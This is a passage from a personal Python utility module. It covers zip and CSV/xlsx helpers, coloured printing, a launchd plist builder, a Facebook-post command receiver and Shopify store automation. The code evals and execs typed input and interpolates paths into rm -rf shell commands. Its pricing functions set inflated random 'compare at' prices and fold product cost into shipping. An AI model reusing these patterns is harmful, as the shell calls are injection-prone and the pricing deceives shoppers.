ws = wb.worksheets[0]
globalise(wb,"workbook")
ws[cell].value = x
if save:
wb.save("out.xlsx")
return wb
def xir(x,**kwargs):
[setattr(x,i,j) for i,j in kwargs.items()]
return x
def xplist(x):
r = '\n <?xml version="1.0" encoding="UTF-8"?>\n <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">\n <plist version="1.0">\n <dict>\n <key>Label</key>\n <string>{}</string>\n <key>ProgramArguments</key>\n <array>\n <string>/Users/%s/tavern/bin/python3.5</string>\n <string>-c</string>\n <string>{}</string>\n </array>\n <key>UserName</key>\n <string>%s</string>\n <key>StandardOutPath</key>\n <string>{}</string>\n <key>StandardErrorPath</key>\n <string>{}</string>\n <key>KeepAlive</key>\n <true/>\n </dict>\n </plist>\n '%(getuser(),getuser())
title = "%s"%([exec("import nltk",globals()),random.sample(random.sample(list(nltk.wordnet.wordnet.all_synsets(nltk.wordnet.wordnet.NOUN)),1)[0].lemmas(),1)[0].name()][1])
os.makedirs(homepath("~/tavern/tavern/soda/plists"),exist_ok=True)
save_path = homepath("~/tavern/tavern/soda/plists/%s.plist"%(title))
y = 'import os; os.chdir(os.path.expanduser("~/tavern/tavern")); from soda.can import *; %s'%(x)
x = r.format(save_path.split("/")[-1].split(".")[0],y,save_path+".out",save_path+".err").strip().replace("\n ", "\n")
open(save_path, "w").write(x)
return x
def zipUtil(address,reverse=not True):
if reverse!=True:
# - zip - a file
redprint(" # - zip - a file ---- ")
# set original path
redprint(" # set original path ---- ")
setitem(globals(),"cwd",os.getcwd())
# normalize address
redprint(" # normalize address ---- ")
setitem(globals(),"address",address_normalize(address))
# chdir from homepath to /Users, ~/picture.png to homepath, tryprocess from picture.png to `""`
redprint(" # chdir from homepath to /Users, ~/picture.png to homepath, tryprocess from picture.png to `""` ---- ")
tryprocess(os.chdir, "/".join(globals()["address"].split("/")[:-1]))
# set address to ./`address`
redprint(" # set address to ./`address` ---- ")
setitem(globals(),"address",globals()["address"]if(-1==globals()["address"].find("/"))else(globals()["address"].split("/")[-1]))
# remove the directed address
redprint(" # remove the directed address ---- ")
subprocess.getoutput(""" rm -rf "%s.zip" """%globals()["address"])
# waitfor directed address gone
redprint(" # waitfor directed address gone ---- ")
while(1==os.path.exists("%s.zip"%globals()["address"])): time.sleep(0.1)
# zip ~/tavern/tavern/drawings to ./drawings.zip
redprint(" # zip ~/tavern/tavern/drawings to ./drawings.zip ---- ")
subprocess.getoutput("""zip -r "%s.zip" "%s" """%(globals()["address"],globals()["address"]))
# waitfor gone not directed address
redprint(" # waitfor gone not directed address ---- ")
while(0==os.path.exists("%s.zip"%globals()["address"])): time.sleep(0.1)
# revert to original path
redprint(" # revert to original path ---- ")
os.chdir(globals()["cwd"])
redprint(address+".zip",)
return address+".zip"
elif reverse==True:
# - unzip - a file
redprint(" # - unzip - a file ---- ")
# remove&waitfor directed folder address
redprint(" # remove&waitfor directed folder address ---- ")
subprocess.getoutput("""rm -rf "%s" """%(address[:-4]))
while(1==os.path.exists(address[:-4])): time.sleep(0.1)
# unzip&waitfor directed folder address
redprint(" # unzip&waitfor directed folder address ---- ")
if "/" in address:
direc = "/".join(address.split("/")[:-1])
os.chdir(direc)
subprocess.getoutput("""unzip "%s" """%(address))
#while(0==os.path.exists(address[:-4])): time.sleep(0.1)
# remove&waitfor original zip address
redprint(" # remove&waitfor original zip address ---- ")
subprocess.getoutput("""rm -rf "%s" """%(address))
#while(1==os.path.exists(address)): time.sleep(0.1)
redprint(address[:-4],)
return address[:-4]
def zipeven(x,y,z):
x, y = list(x), list(y)
if len(x) != len(y):
if len(y) > len(x):
x.append(z)
elif len(x) > len(y):
y.append(z)
return zip(x,y)
"""
assert list(zipeven([1,2,3],[1,2],None)) == [(1, 1), (2, 2), (3, None)]
assert list(zipeven([1,2],[1,2,3],None)) == [(1, 1), (2, 2), (None, 3)]
"""
def zki(x,y,z):
if x():
return lmap(y,z)
else:
return z
"""
zki(lambda: 1==1, lambda i: i+1, [1,2,3])
zki(lambda: 1==2, lambda i: i+1, [1,2,3])
"""
def zz(x):
#print("sleeping %s"%x); time.sleep(x)
time.sleep(x)
class AD(dict):
def __recurse__(self):
keys_to_change = []
for a,b in self.items():
#print(v,"\n")
if "values" in dir(b):
keys_to_change.append(a)
for a in keys_to_change:
self[a] = AD(self[a])
list_keys = []
for a,b in self.items():
if "append" in dir(b) and "extend" in dir(b):
list_keys.append(a)
for a in list_keys:
self[a] = [AD(i) if "values" in dir(i) else i for i in self[a]]
def __getattr__(self, attr):
self.__recurse__()
#print(self[attr])
return self[attr]
def __setattr__(self, attr, value):
self[attr] = value
self.__recurse__()
def copy(self):
return AD(self)
def __test__(self):
d = {"a": {"a": {"a": "a"}}}
dd = AD(d)
assert "AD" in str(type(dd))
assert "AD" in str(type(dd.a))
assert "AD" in str(type(dd.a.a))
dd.b = d
dd["c"] = d
assert "AD" in str(type(dd.b))
assert "AD" in str(type(dd.b.a))
assert "AD" in str(type(dd.b["a"]))
assert "AD" in str(type(dd.c))
assert "AD" in str(type(dd["c"].a))
assert "AD" in str(type(dd["c"]['a']))
dd.update({"e":{"a":{"a":1}}})
assert "AD" in str(type(dd.e.a))
dd.pop("e")
assert "e" not in dd.keys()
assert list(sorted(dd.items())) == [("a", {"a": {"a": "a"}}), ("b", {"a": {"a": {"a": "a"}}}), ("c", {"a": {"a": {"a": "a"}}})]
assert "".join(sorted(str(list(dd.values())))) == " '''''''''''''''''''''',,::::::::[]aaaaaaaaaaa{{{{{{{{}}}}}}}}"
assert list(sorted(dd.keys())) == [ 'a', 'b', 'c']
assert dd.get("a") == {'a': {'a': 'a'}}
assert dd.copy() == AD(dd)
dd.get("a")
dd.get("a", 1)
assert tryreturn(dd.get, "d") == 0
dd.clear()
assert dd == {}
redprint("tests successful")
d = {"a": {"a": [{"a": "a"}]}}
dd = AD(d)
assert "AD" in str(type(dd.a.a[0]))
def items(self):
d = []
for k,v in super().items():
#print("items:_ v: %s" % v)
if "values" in dir(v):
d.append((k, AD(v)))
else:
d.append((k, v))
# This stops if it iterates to a value (v) which is not a dictionary. such as a list of dictionaries.
return d
def get(self, *args):
try: return self[args[0]]
except:
if len(args) == 2:
return args[1]
else:
return self[args[0]]
class Aomoji(AD):
def __repr__(self):
return "{}".format(self.f)
def __init__(self):
super().__init__()
self.a = "(⌐■_■)"
self.b = "[̲̅$̲̅(̲̅ ͡° ͜ʖ ͡°̲̅)̲̅$̲̅]"
self.c = "( ・∀・)・・・--------☆"
self.d = "٩(◕‿◕)۶"
self.e = "ᶘ ᵒᴥᵒᶅ"
self.f = "Ƹ̵̡Ӝ̵̨̄Ʒ"
self.cat = "🐈"
self.hamster = "🐹"
self.fox = "🦊"
self.panda = "🐼"
self.bear = "🐻"
self.frog = "🐸"
self.bee = "🐝"
self.mosquito = "🦟"
self.cricket = "🦗"
self.spider = "🕷"
self.turtle = "🐢"
self.octopus = "🐙"
self.squid = "🦑"
self.whale = "🐳"
self.shark = "🦈"
self.alligator = "🐊"
self.rat = "🐀"
self.squirrel = "🐿"
class B_Colors:
builtin_input = input
builtin_print = print
bprint = builtin_print
def print(*args, **kwargs):
globals()["printed"] = [] if "printed" not in globals() else globals()["printed"]
globals()["printed"].append(" ".join([str(i) for i in args]))
args = list(args)
#args.insert(0, "[%s] "%datetime.now())
args = tuple(args)
builtin_print(*args, **kwargs)
if "colored" not in globals():
from termcolor import colored
setitem(globals(),"colored",colored)
redprint = lambda *args, **kwargs: [[builtin_print(colored(" ".join(list(map(str, args))), "red"),**kwargs) if "attrs" not in kwargs else builtin_print(colored(" ".join(list(map(str, args))), "red", attrs=kwargs["attrs"]))], sys.stdout.flush()]
greenprint = lambda *args, **kwargs: [[builtin_print(colored(" ".join(list(map(str, args))), "green"),**kwargs) if "attrs" not in kwargs else builtin_print(colored(" ".join(list(map(str, args))), "green", attrs=kwargs["attrs"]))], sys.stdout.flush()]
yellowprint = lambda *args, **kwargs: [[builtin_print(colored(" ".join(list(map(str, args))), "yellow"),**kwargs) if "attrs" not in kwargs else builtin_print(colored(" ".join(list(map(str, args))), "yellow", attrs=kwargs["attrs"]))], sys.stdout.flush()]
blueprint = lambda *args, **kwargs: [[builtin_print(colored(" ".join(list(map(str, args))), "blue"),**kwargs) if "attrs" not in kwargs else builtin_print(colored(" ".join(list(map(str, args))), "blue", attrs=kwargs["attrs"]))], sys.stdout.flush()]
magentaprint = lambda *args, **kwargs: [[builtin_print(colored(" ".join(list(map(str, args))), "magenta"),**kwargs) if "attrs" not in kwargs else builtin_print(colored(" ".join(list(map(str, args))), "magenta", attrs=kwargs["attrs"]))], sys.stdout.flush()]
cyanprint = lambda *args, **kwargs: [[builtin_print(colored(" ".join(list(map(str, args))), "cyan"),**kwargs) if "attrs" not in kwargs else builtin_print(colored(" ".join(list(map(str, args))), "cyan", attrs=kwargs["attrs"]))], sys.stdout.flush()]
whiteprint = lambda *args, **kwargs: [[builtin_print(colored(" ".join(list(map(str, args))), "white"),**kwargs) if "attrs" not in kwargs else builtin_print(colored(" ".join(list(map(str, args))), "white", attrs=kwargs["attrs"]))], sys.stdout.flush()]
redinput = lambda *args, **kwargs: [input(colored(" ".join(list(map(str, args))), "red"),**kwargs) if "attrs" not in kwargs else input(colored(" ".join(list(map(str, args))), "red", attrs=kwargs["attrs"]))][-1]
greeninput = lambda *args, **kwargs: [input(colored(" ".join(list(map(str, args))), "green"),**kwargs) if "attrs" not in kwargs else input(colored(" ".join(list(map(str, args))), "green", attrs=kwargs["attrs"]))][-1]
yellowinput = lambda *args, **kwargs: [input(colored(" ".join(list(map(str, args))), "yellow"),**kwargs) if "attrs" not in kwargs else input(colored(" ".join(list(map(str, args))), "yellow", attrs=kwargs["attrs"]))][-1]
blueinput = lambda *args, **kwargs: [input(colored(" ".join(list(map(str, args))), "blue"),**kwargs) if "attrs" not in kwargs else input(colored(" ".join(list(map(str, args))), "blue", attrs=kwargs["attrs"]))][-1]
magentainput = lambda *args, **kwargs: [input(colored(" ".join(list(map(str, args))), "magenta"),**kwargs) if "attrs" not in kwargs else input(colored(" ".join(list(map(str, args))), "magenta", attrs=kwargs["attrs"]))][-1]
cyaninput = lambda *args, **kwargs: [input(colored(" ".join(list(map(str, args))), "cyan"),**kwargs) if "attrs" not in kwargs else input(colored(" ".join(list(map(str, args))), "cyan", attrs=kwargs["attrs"]))][-1]
whiteinput = lambda *args, **kwargs: [input(colored(" ".join(list(map(str, args))), "white"),**kwargs) if "attrs" not in kwargs else input(colored(" ".join(list(map(str, args))), "white", attrs=kwargs["attrs"]))][-1]
def distinct_print(*args, **kwargs):
distinct_print_dict = {1:redprint, 2: greenprint, 3: yellowprint, 4: blueprint, 5: magentaprint, 6: cyanprint, 7: whiteprint}
while True:
if "DISTINCT_PRINT_COUNTER" not in globals().keys():
globals()["DISTINCT_PRINT_COUNTER"] = random.randrange(1, 8)
distinct_print_dict[globals()["DISTINCT_PRINT_COUNTER"]](*args, **kwargs)
break
else:
x = random.randrange(1, 8)
if x == globals()["DISTINCT_PRINT_COUNTER"]:
continue
else:
distinct_print_dict[x](*args, **kwargs)
globals()["DISTINCT_PRINT_COUNTER"] = x
break
def dprint(*args, **kwargs):
distinct_print_dict = {1:redprint, 2: greenprint, 3: yellowprint, 4: blueprint, 5: magentaprint, 6: cyanprint, 7: whiteprint}
while True:
if "DISTINCT_PRINT_COUNTER" not in globals().keys():
globals()["DISTINCT_PRINT_COUNTER"] = random.randrange(1, 8)
distinct_print_dict[globals()["DISTINCT_PRINT_COUNTER"]](*args, **kwargs)
break
else:
x = random.randrange(1, 8)
if x == globals()["DISTINCT_PRINT_COUNTER"]:
continue
else:
distinct_print_dict[x](*args, **kwargs)
globals()["DISTINCT_PRINT_COUNTER"] = x
break
def drkprint(*args, **kwargs):
from colored import fg, bg
args = ", ".join(lmap(str,args))
x = "%s%s" % (fg(255), bg(0))
#x = "%s" % (fg(random.randrange(1,256)))
builtin_print("%s%s" % (x, args))
def rprint(*args, **kwargs):
from colored import fg, bg
args = ", ".join(args)
#x = "%s %s" % (fg(random.randrange(1,256)), bg(random.randrange(1,256)))
x = "%s" % (fg(random.randrange(1,256)))
builtin_print("%s%s" % (x, args))
def random_input(*args, **kwargs):
from colored import fg, bg
args = ", ".join(args)
#x = "%s %s" % (fg(random.randrange(1,256)), bg(random.randrange(1,256)))
x = "%s" % (fg(random.randrange(1,256)))
builtin_input("%s %s" % (x, args))
def distinct_input(*args, **kwargs):
distinct_input_dict = {1:redinput, 2: greeninput, 3: yellowinput, 4: blueinput, 5: magentainput, 6: cyaninput, 7: whiteinput}
while True:
if "DISTINCT_INPUT_COUNTER" not in globals().keys():
globals()["DISTINCT_INPUT_COUNTER"] = random.randrange(1, 8)
distinct_input_dict[globals()["DISTINCT_INPUT_COUNTER"]](*args, **kwargs)
break
else:
x = random.randrange(1, 8)
if x == globals()["DISTINCT_INPUT_COUNTER"]:
continue
else:
distinct_input_dict[x](*args, **kwargs)
globals()["DISTINCT_INPUT_COUNTER"] = x
break
globals().update(locals())
class DecisionTree(object):
def init(self):
if hasattr(self, 'functions_sorted'):
self.functions = [getattr(self, i) for i in self.functions_sorted]
return
self.functions = []
for i in dir(self):
v = getattr(self, i)
from types import MethodType,ModuleType,FunctionType
if type(v) is MethodType and '__' not in i and i not in ['exec', 'show', 'run', 'init']:
self.functions.append(i)
self.functions = sorted(self.functions)
self.functions = [getattr(self, i) for i in self.functions]
def exec(self, command):
command = eval(command)
for i in dir(self):
try: locals().update(getattr(self,i).__globals__)
except: pass
for i in sorted(locals()):
print(i)
import pyperclip
pyperclip.copy(command)
exec(command)
def show(self):
print('\n'*2)
print('='*42)
for idx, i in zip([i for i in range(1000) if i <= 12 or i >= 14], self.functions, ):
if i.__name__ != "<lambda>": print("%s. %s"%(idx, i.__name__))
else: print("%s. %s"%(idx, get_lambda_name(i)))
def run(self):
self.init()
while True:
try:
self.show()
now_what = input("\nNow what?\n: ")
if now_what == 'q':
print("QUITTING")
return
args = now_what
if args[:4] == 'exec':
self.exec(args[4:])
continue
args = now_what.split(' ')
func_idx = int(args.pop(0))
func = dict(zip([i for i in range(1000) if i <= 12 or i >= 14], self.functions, ))[func_idx]
if len(args) == 0:
call = func.__call__()
elif len(args) > 0:
call = func.__call__(*args)
if call != None:
return call
except Exception as e:
print("There was an error: %s"%e)
class CH:
def __call__(self, p, shop=None):
shop = or_list(lambda:Shop()(Get(Product,id=p.id).shop),lambda:Shop()(shop))
collection = None
if(0==len([i for i in apilimitcall(lambda:shop.shopify.CustomCollection.find(title=p.product_type)) if i.title==p.product_type])):
(shop.shopify.CustomCollection(dict(OrderedDict([ ["title",p.product_type], ["body_html", ""], ["image",{"src":p.image.src, "alt":p.product_type }], ["published",True], ["sort_order","manual"], ["published_scope","global"], ]))).save())
collection = (apilimitcall(lambda:[i for i in shop.shopify.CustomCollection.find(title=p.product_type) if i.title == p.product_type][0]))
else:
collection = (apilimitcall(lambda:[i for i in shop.shopify.CustomCollection.find(title=p.product_type) if i.title == p.product_type][0]))
apilimitcall(lambda:shop.shopify.Collect({"position":0,"collection_id":collection.id,"product_id":p.id,}).save())
def mcc(self, shop, title):
shop = Shop()(shop)
collection = [(CH().mcc(shop.shop_abbreviation,title))if(False==(shop.shopify.CustomCollection(dict(OrderedDict([ ["title",title], ["body_html", ""], ["image",None], ["published",True], ["sort_order","manual"], ["published_scope","global"], ]))).save()))else(),(shop.shopify.CustomCollection.find(title=title)[0])][1]if(0==len([i for i in shop.shopify.CustomCollection.find(title=title) if i.title==title]))else(shop.shopify.CustomCollection.find(title=title)[0])
def create_collect(self,shop,product=None,handle=None,position=None,):
product=shop.shopify.Product.find(handle=handle)[0]if(product==None)else(product)
try:
0/shop.shopify.Collect({
"collection_id":shop.shopify.CustomCollection.find(title=product.product_type)[0].id ,
"position":min([max([len(shop.shopify.CustomCollection.find(title=product.product_type)[0].products())/2,len(shop.shopify.CustomCollection.find(title=product.product_type)[0].products())]),30]) if(None==position)else(position),
"product_id":product.id ,
}).save()
except Exception as e:
redprint(e)
redprint("MAJOR ERROR: COLLECT NOT SAVING... CHECK FOR IF THIS OCCURS")
def remove(self,product,product_type):
shop = Shop()(product.shop)
product = product.p()
l = shop.shopify.CustomCollection.find(title=Get(Product,id=product.id).product_type)
l = [i for i in l if i.title == product_type][0]
product.product_type = product_type
product.save()
l.remove_product(product)
CH()(product)
Update(Get(Product,id=product.id),product_type=product_type)
def whole_collection_resort(self,shop):
if type(shop) == str:shop = Shop()(shop)
products = getshopifyproducts(shop.shop_abbreviation)
product_types = sorted(set(key("product_type",products)))
collections = shop.shopify.CustomCollection.find(status="any",limit=250)
for i in product_types:
product_type = i
print(product_type)
collection_ = [i for i in collections if i.title == product_type]
print(collection_)
try:
collection_ = collection_[0]
except:
print("could not find one")
continue
products_ = [i for i in products if i.product_type == product_type]
coll_prods = shop.pfind(collection_id=collection_.id,limit=250)
for j in products_:
if j not in coll_prods:
product_to_add = j
# collection_.add_product(product_to_add)
CH()(product_to_add,shop.shop_abbreviation)
print("adding one product %s to %s"%(j.product_type,product_type))
time.sleep(0.5)
coll_prods = shop.pfind(collection_id=collection_.id,limit=250)
for j in coll_prods:
if j.product_type != product_type:
product_to_remove = j
collection_.remove_product(product_to_remove)
print("removing one product %s from %s"%(j.product_type,product_type))
time.sleep(0.5)
total_product_count = 0
for i in collections:
coll_prods = shop.pfind(collection_id=i.id,limit=250)
total_product_count = total_product_count + len(coll_prods)
assert len(set(sud("product_type",coll_prods))) == 1
assert list(set(sud("product_type",coll_prods)))[0] == i.title
len_products = len([j for j in products if j.product_type == i.title])
assert len_products == len(coll_prods)
print("%s products for %s, %s in collection"%(len_products,i.title,len(coll_prods)))
assert total_product_count == len(products)
print("%s total product count for %s products"%(total_product_count,len(products)))
def assign_plus_size_tags(self):
for i in All(Product):
L=set(flatten(keymulti(["option1","option2","option3"],i.variants),1))
if "3XL" in L:
print(L)
i.product_tags = add_tag(i.product_tags,"Plus Size")
print(i.product_tags)
i.save()
Q=Shop()(i.shop).pfind(id_=i.id)
Q.tags=i.product_tags
Q.save()
def get_compare_at_price(self,new_price):
multiplier = 0.01 * random.randrange(150, 220)
compare_at_price = multiplier * new_price
compare_at_price = int(compare_at_price)
compare_at_price = compare_at_price - 0.05
return compare_at_price
def free_plus_ship(self,product_id):
product = None
if(Product==type(product_id)): 1
else: product = Product.objects.get(id=product_id)
shop = Shop()( product.shop)
shop
shop
product = apilimitcall(lambda:shop.shopify.Product.find(id_=product_id))
for variant in product.variants:
price = float(variant.price)
import math
variant.grams = math.ceil(price/10) * 100
variant.weight = 0.1
variant.compare_at_price = ((variant.weight*10)*9.95) * (random.randrange(14,18)/10)
variant.price = 0.00
redprint("variant weight: %s" % variant.weight)
redprint("variant compare_at_price: %s" % variant.compare_at_price)
redprint("variant price: %s" % variant.price)
print("")
varsave(product)
def adjust_weights(self,shop):
try: shop = Shop()(shop)
except: pass
products = getshopifyproducts(shop)
for i in products:
for j in i.variants:
weight_unit = "kg"
weight = None
price = None
price = float(j.price)
weight = float(j.weight)
if j.weight_unit == "kg" and price != 0.0 and weight == 0:
None
else:
if price == 0.0:
weight = 0.1
else:
weight = 0.0
j.weight = weight
j.price = price
j.weight_unit = weight_unit
j.save()
print("[%s][%s][%s][%s][%s]"%(j.weight_unit, j.weight, j.price, j.title, i.id))
time.sleep(0.5)
def price_change(self,old_price,shop):
old_price = round(old_price,2)
if "%s_price_list"%(shop) in key("w",All(ExecutableText)):
price_list = ExecutableText().export("%s_price_list"%(shop))
if old_price not in price_list:
return (int(old_price * 1.7) - 0.05)
else:
return price_list[old_price]
else:
if len(Filter(PriceChange,shop=shop)): return (old_price*2) - 0.05
x = PriceChange().price_change(old_price,shop)
return x
return
new_price = 0
if 0 <= old_price < 5:
new_price = old_price + 10
elif 5 <= old_price < 10:
new_price = old_price + 8
elif 10 <= old_price < 15:
new_price = old_price * 2
elif 15 <= old_price < 20:
new_price = old_price * 2
elif 20 <= old_price < 40:
new_price = old_price * 2
elif 40 <= old_price < 60:
new_price = old_price * 1.8
elif 60 <= old_price < 80:
new_price = old_price * 1.65
elif 80 <= old_price < 100:
new_price = old_price * 1.6
elif 100 <= old_price < 1000:
new_price = old_price * 1.59
new_price = int(new_price)
new_price = new_price - 0.05
print("old price: %s, new price: %s" % (old_price, new_price))
if new_price <= 14 and new_price >= 10 and old_price <= 7:
new_price = 9.95
return new_price
def reset_weight_on_priced_product(self,product):
if type(product) is Product:
product = Shop()(product.shop).shopify.Product.find(id_=product.id)
changed = False
for v in product.variants:
if float(v.price) != 0 and float(v.weight) != 0:
v.weight = 0
changed = True
distinct_print("[reset_weight_on_priced_product][changed = True] [%s]"%product.id)
if float(v.price) == 0 and float(v.weight) == 0:
os.system("touch ~/%s_v_price_and_v_weight==0____vendor_%s"%(product.id,product.vendor))
if changed == True: product.save()
class Chatter:
def get_texts(self):
thoughts = (thought for i in range(500))
for i in thoughts:
if talking_about_programming_for_timeframe_until_february_7th_2019(i):
dont_talk()
class CommandReceiver:
def __init__(self):
# 'email = CommandEmail()()\nemailer = Emailer().set_services_initiate_2(email.email)\nmsgs = emailer.set_messages(10)\nx = sudby(lambda i:"UNREAD" in i.labelIds,filter(msgs,subject="command",sender=email.receiving_email))\nnew = x[-1]\ncommand,data="twirl1",SOUP(new.hidden_message_3.decode()).text\ncommands = {"twirl1":lambda x:([setattr(g,"Z",x.strip()),pool(lambda:tp(lambda:Product().add_product(caption=x.split("\\n")[1],url=x.split("\\n")[0]),ep=1))])}\ncommands[command](data)\n'
posts = get_feed()
commands = {
"postit":lambda x:([setattr(g,"Z","twirl1: caption"),pool(lambda:tp(lambda:Product().add_product(post_caption=x.split("\n",1)[1],url=x.split("\n")[0]),ep=1))]),
"changeshop":lambda x:Update(Muta()(),store_abbre=x.split(",")[0],page=x.split(",")[1])
}
posts = sudby(lambda i:str(i.get("message")).split("\n")[0] in commands.keys(),tcer(posts))
lmap(lambda i:tp(lambda:FacebookNewsFeedPosts().add(created_time=Date().parse_date(i["created_time"],localize_timezone=True),message=i["message"])),posts)
if not Filter(FacebookNewsFeedPosts,posted=0): return
new = list(Filter(FacebookNewsFeedPosts,posted=0))[0]
command,data = new.message.split("\n")[0],new.message.split("\n",1)[1]
commands[command](data)
Update(list(Filter(FacebookNewsFeedPosts,posted=0))[0],posted=1)
class CSV(DecisionTree):
exec("from csv import *")
def ListWrite(self,fn,data,delimiter=",",newline="\n"):
with open(fn,'w',newline=newline) as f:
f=csv.writer(f,delimiter=delimiter)
f.writerows(data)
def ListRead(self,fn,delimiter=","):
with open(fn,'r') as f:
data=list(csv.reader(f,delimiter=delimiter))
return data
def DictRead(self, fn, fields=None, delimiter='\t',encoding='utf8',errors='ignore'):
import codecs
if not fields:
with open(fn,'r',encoding=encoding,errors=errors) as f:
try: fields = list(csv.reader(f,delimiter=delimiter))[0]
except: fields = list(csv.DictReader(codecs.open(fn, 'rU', 'utf-16', errors=errors), dialect='excel', delimiter=delimiter))[0]
with open(fn,'r',encoding=encoding,errors=errors) as f:
try: pay = list(csv.DictReader(f,delimiter=delimiter))
except: pay = list(csv.DictReader(codecs.open(fn, 'rU', 'utf-16', errors=errors), dialect='excel', delimiter=delimiter))
pay= pay if not fields else \
[{a:b for a,b in _dict.items() if a in fields} for _dict in pay]
return pay
def DictReadWithDelimiterGuess(self, fn, fields=None,encoding='utf8',errors='ignore'):
A=flatten(lmap(list,keycall("values",CSV().DictRead(fn,delimiter="\t",encoding=encoding,errors=errors))),1)
B=flatten(lmap(list,keycall("values",CSV().DictRead(fn,delimiter=",",encoding=encoding,errors=errors))),1)
delimiter = 0
if len(B)>=len(A):
delimiter = ","
else:
delimiter = "\t"
return CSV().DictRead(fn, fields=fields, delimiter = delimiter)
def DictWriteWithHeaders(self, fn, _dictlist, headers, delimiter='\t'):
with open(fn, 'w', newline='\n') as csvfile:
writer = csv.writer(csvfile, delimiter=delimiter)
writer.writerow(headers)
for row in _dictlist:
targetrow = []
for key in headers:
try:targetrow.append(row[key])
except:targetrow.append(getattr(row, key))
writer.writerow(targetrow)
def DictWrite(self, fn, _dictlist, delimiter = '\t'):
with open(fn, 'w') as f:
import csv
f=csv.DictWriter(f = f, fieldnames=_dictlist[0].keys(), delimiter=delimiter)
f.writeheader()
f.writerows(_dictlist)
def DictAppend(self, fn, _dictlist, delimiter = '\t'):
with open(fn, 'a') as f:
import csv
f=csv.DictWriter(f = f, fieldnames=_dictlist[0].keys(), delimiter=delimiter)
f.writeheader()
f.writerows(_dictlist)
def pick_data(self, data, fields, returntype="OrderedDict"):
payload = []
for i in data:
d = OrderedDict() if returntype == "OrderedDict" else AttrDict()
for j in fields:
try: d[j] = getattr(i, j, None) # prefer pick_data from an attritem .
except: d[j] = i.get(j, None) # 2ndprefer pick_data from a dictionary
payload.append(d)
return payload
def transpose_csv(self,fn,delimiter='\t'):
a = zip(*csv.reader(open(fn, "r"),delimiter=delimiter))
csv.writer(open(fn, "w")).writerows(a)
def excel_open(self, fn):
system('/Applications/Microsoft\ Excel_2016.app/Contents/MacOS/Microsoft\ Excel %s &'%os.path.abspath(fn))
def xlsx_to_csv(self, workbook, sheet, as_dict=True):
import csv
import openpyxl
wb = openpyxl.load_workbook(workbook)
ws = wb[sheet]
data = [key("value",i) for i in list(ws.rows)]
if as_dict == False:
return data
if as_dict == True:
dictlist = [AttrDict(dict(zip(data[0],i))) for i in data[1:]]
return dictlist
def dictlist_to_xlsx(self, dictlist, headers, workbook, sheet):
CSV().DictWriteWithHeaders(fn="tmp.csv", _dictlist = dictlist, headers = headers)
CSV().csv_to_xlsx(infile="tmp.csv", workbook=workbook, sheet=sheet, rm_infile = True)
def xlsx_column_to_images(self, workbook, sheet, column):
import openpyxl
column = int(column) # in case this is being run via class DecisionTree
wb = openpyxl.load_workbook(workbook)
ws = wb[sheet]
count_rows = len(list(ws.rows))
for i in range(count_rows):
ws.row_dimensions[i].height = 100
column_letter = list(ws.columns)[column - 1][0].coordinate[0]
print(column_letter)
ws.column_dimensions[column_letter].width = 100
column = list(ws.columns)[column - 1] # Column B -> Column 2 -> list(ws.columns)[1] ; 2->1
for cell in column[1:20]:
value = cell.value
cell.value = "" # Keeping the URL inside widens the row.
cyanprint("value: %s" % value)
if value == None:
continue
if cell.row == 1:
continue
image_path = None
if "https://" in value:
redprint("Downloading %s" % value)
try:image_path = Images().download(value, )
except Exception as e : print("%s,%s"%(image_path,e)); continue
#while os.path.exists(image_path) == False: [redprint("waiting for image"), time.sleep(1)]
else:
redprint("image path = value %s" % value)
image_path = value
if os.path.exists(image_path) == False:
redprint("[Does not exist][%s]"%image_path); continue
img = openpyxl.drawing.image.Image(image_path)
img.height = 100
img.width = 100
ws.add_image(img, cell.coordinate)
#column_letter = cell.coordinate[0]
os.system("rm %s/tmp.jpg &>/dev/null"%os.getcwd())
wb.save(workbook)
def csv_to_xlsx(self, infile, workbook, sheet, rm_infile = False, delimiter="\t"):
print("""[Solved] One limitation of csv_to_xlsx currently is that it fills in x&y based on your infile's data size. if it's overwriting a smaller.""")
import csv
import openpyxl
assert openpyxl.__version__ == "2.5.4"
try:
wb = openpyxl.load_workbook(workbook)
except:
wb = openpyxl.Workbook()
try:
ws = wb[sheet]
except Exception as e:
print(e, "creating sheet")
ws = wb.create_sheet(sheet)
tp(lambda:wb.remove_sheet(wb.get_sheet_by_name("Sheet")))
### first, clear all data so the event of data smaller leaving duplicates does not occur
for i in list(ws.rows):
for j in i:
j.value = None
with open(infile,"r") as f:
data = list(csv.reader(f, delimiter=delimiter))
for idx, i in enumerate(data):
for idx2, j in enumerate(i):
# i think if you make it a thread, the workbook may not save before all threads finish, and there may be overlap
try: ws.cell(row=idx+1, column=idx2+1).value = j
except: ws.cell(row=idx+1, column=idx2+1).value = "ERROR_VALUE"
wb.save(workbook)
if rm_infile:
os.remove(infile)
@staticmethod
def csvprint(data, width=1, colnames=None, spacer="|",print_headers=1,alignleft=True):
import django
if type(data) == django.db.models.query.QuerySet:
data = [OrderedDict([[a,str(getattr(x,a))] for a in list(sorted(x.__dict__.keys())) if not a.startswith("_")]) for x in data]
if len(data) == 0:
redprint("[no data][exitting]")
return
if colnames:
payload = []
for i in data:
tmp = OrderedDict()
for j in colnames:
try: tmp[j] = getattr(i, j)
except: tmp[j] = i[j]
payload.append(tmp)
data = payload
if not colnames:
colnames = data[0].keys()
column_dict = dict(zip(colnames, [i.upper() for i in colnames]))
ifdo(lambda:print_headers,lambda:data.insert(0, column_dict))
text = []
for i in colnames:
max_len = max(listmap(len, listmap(str, key(data, key=i))))
for idx, j in enumerate(data):
try: addition = str(j[i])
except: addition = str(getattr(j, i))
number_of_spaces = max_len - len(addition)
if alignleft:
addition += (spacer*(number_of_spaces+width))
else:
addition = (spacer*(number_of_spaces+width)) + addition
try: text[idx] += addition
except: text.append(addition)
data.pop(0)
if alignleft:
distinct_print('\n'.join([spacer*len(text[-1])+(spacer*width)]+[((spacer*width)+i) for i in text]+[spacer*len(text[-1])+(spacer*width)]))
else:
distinct_print('\n'.join([spacer*len(text[-1])+(spacer*width)]+[(i+(spacer*width)) for i in text]+[spacer*len(text[-1])+(spacer*width)]))
print("")
def get_workbook_sheet_styles(self, workbook_path):
import _pickle
import openpyxl
workbook_sheet_styles = {}
wb = openpyxl.load_workbook(workbook_path)
sheetnames = wb.sheetnames
sheetnames.pop(sheetnames.index("Sheet"))
for sheetname in sheetnames:
ws = wb[sheetname]
columns = list(ws.columns)
column_names = [i[0].value for i in columns]
sheet_styles = {}
for column_name, column in zip(column_names,columns):
sheet_styles[column_name] = {
